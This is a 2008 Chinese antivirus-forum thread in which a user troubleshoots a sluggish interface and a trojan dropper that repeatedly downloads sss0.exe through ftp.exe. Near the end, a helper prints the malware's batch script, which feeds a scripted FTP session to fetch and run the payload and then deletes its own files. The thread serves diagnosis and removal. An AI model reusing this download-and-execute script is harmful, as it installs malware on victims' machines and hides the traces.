微点交流论坛

标题: 主界面初始化错误 [打印本页]

作者: 麦饭 时间: 2008-4-4 19:55 标题: 主界面初始化错误

一开始是可心打开的，不过我在主界面里进行的任何操作都表现得非常迟钝。
不过我今天中过一次毒，那个毒微点无法完全清除，但有害操作都被微点给拦了下来，所以也没造成什么问题，至于这个问题是不是跟中毒有关系目前还不清楚

另外，病毒样本下午已经发送了

作者: Legend 时间: 2008-4-4 19:59
请问楼主安装微点的同时，是否安装了其他安全软件？请问楼主中过一个病毒，微点无法完全清除，是否是微点提示延迟删除，请楼主将技术支持信息（辅助功能--生成技术支持信息）发到support@micropoint.com.cn，我们帮您分析一下，请楼主在邮件中附带本链接，方便及时跟踪您的问题。

作者: 麦饭 时间: 2008-4-4 20:16
现在又可以打开了，不过在点击任务栏里的微点图标的时候如果是多点了几下的话主界面会自己关闭
至于病毒的事可能是我没说清楚先看下日志：
2008-04-04 16:29:37 处理成功 Trojan-Dropper.Win32.Agent.jkm C:\WINDOWS\SYSTEM32\SSS0.EXE C:\WINDOWS\SYSTEM32\FTP.EXE
2008-04-04 16:10:37 处理成功 Trojan-Dropper.Win32.Agent.jkm C:\WINDOWS\SYSTEM32\SSS0.EXE C:\WINDOWS\SYSTEM32\FTP.EXE
2008-04-04 16:00:35 处理成功 Trojan-Spy.Win32.Pophot.adc C:\WINDOWS\FIREFOXUPDATER.EXE C:\WINDOWS\SYSTEM32\FTP.EXE
2008-04-04 14:59:33 处理成功 Trojan-Dropper.Win32.Agent.jkm C:\WINDOWS\SYSTEM32\SSS0.EXE C:\WINDOWS\SYSTEM32\FTP.EXE
2008-04-04 14:56:53 处理成功 Trojan-Dropper.Win32.Agent.jkm C:\WINDOWS\SYSTEM32\SSS0.EXE C:\WINDOWS\SYSTEM32\FTP.EXE
2008-04-04 14:51:18 处理成功 Trojan-Dropper.Win32.Agent.jkm C:\WINDOWS\SYSTEM32\SSS0.EXE C:\WINDOWS\SYSTEM32\FTP.EXE
2008-04-04 14:48:41 处理成功 Trojan-Dropper.Win32.Agent.jkm C:\WINDOWS\SYSTEM32\SSS0.EXE C:\WINDOWS\SYSTEM32\FTP.EXE

微点只会删除SSS0.EXE，但不知道是FTP.EXE把它给下下来的

作者: Legend 时间: 2008-4-4 20:19
ftp是系统程序，不能删除。微点知道是ftp下载的，请您看一下此日志2008-04-04 14:48:41 处理成功 Trojan-Dropper.Win32.Agent.jkm C:\WINDOWS\SYSTEM32\SSS0.EXE C:\WINDOWS\SYSTEM32\FTP.EXE（这个是创建者）

作者: 麦饭 时间: 2008-4-4 20:32
问题是它会不断的从网上下载SSS0.EXE这个程序，但微点没有很好的解决办法
我当时用工具看了一下进程，进程里面有两个CMD进程又分别运行了一个CMD进程，它们的命令行有一大串，应该是转了几道弯以后利用FTP进行下载的。所以日志里面才会显示好几个SSS0被删

作者: Legend 时间: 2008-4-4 20:40
从楼主的日志初步分析微点都已经成功拦截了此病毒，如果一个网站挂马，如果楼主不关闭此网站，那么可能此网站就会不断的下载木马。而下载的病毒微点都已经成功拦截处理。

作者: 麦饭 时间: 2008-4-4 20:59
算了，超版你太强了，小弟我甘拜下风。
不过我当时好像上的都是极其正规的网站哪，莫非我的电脑当时正背着我偷偷摸摸的干非法的勾当？不好意思让超版见笑了，家门不幸，家门不幸哪。

作者: zipponan 时间: 2008-4-5 00:19
楼主你的系统补丁没打全吧

作者: 麦饭 时间: 2008-4-5 12:03
sp3 3300 你说打全了没有?

作者: 点饭的百度空间 时间: 2008-4-5 14:39
找找看有的就结束进程后清除它：
C:\WINDOWS\SYSTEM32\SSS0.EXE
C:\WINDOWS\SOUNDMAN.EXE
C:\WINDOWS\SYSTEM32\INTERNE.EX(syssave.exe)

微点的系统自启动信息看看有没有可疑项目

观察c:\windows\help ：
C:\WINDOWS\help\help.dll
C:\WINDOWS\help\bai.VBS
C:\WINDOWS\help\bai.BAT ：

del sss0.exe
ftp.exe -s:C:\WINDOWS\help\help.dll
if not exist sss0.exe sfd -s:C:\WINDOWS\help\help.dll
if not exist sss0.exe sft -s:C:\WINDOWS\help\help.dll
sss0.exe
sss0.exe
sss01.exe
sss01.exe
if not exist sss0.exe C:\WINDOWS\help\bai.VBS
:end
del C:\WINDOWS\help\help.dll
del C:\WINDOWS\help\bai.BAT
exit

迅雷千千静听之类的应用程序漏洞补丁也打一下

作者: 麦饭 时间: 2008-4-5 18:55
楼上的正解，不过我昨天就搞定了，只不过后来出现了一点小问题而已，不过今天已经完全正常了

作者: 麦饭 时间: 2008-4-5 21:26
我晕死，那个sss0.exe又来了，好在有微点，没造成实际性的伤害

欢迎光临微点交流论坛 (http://bbs.micropoint.com.cn/)

bbs.micropoint.com.cn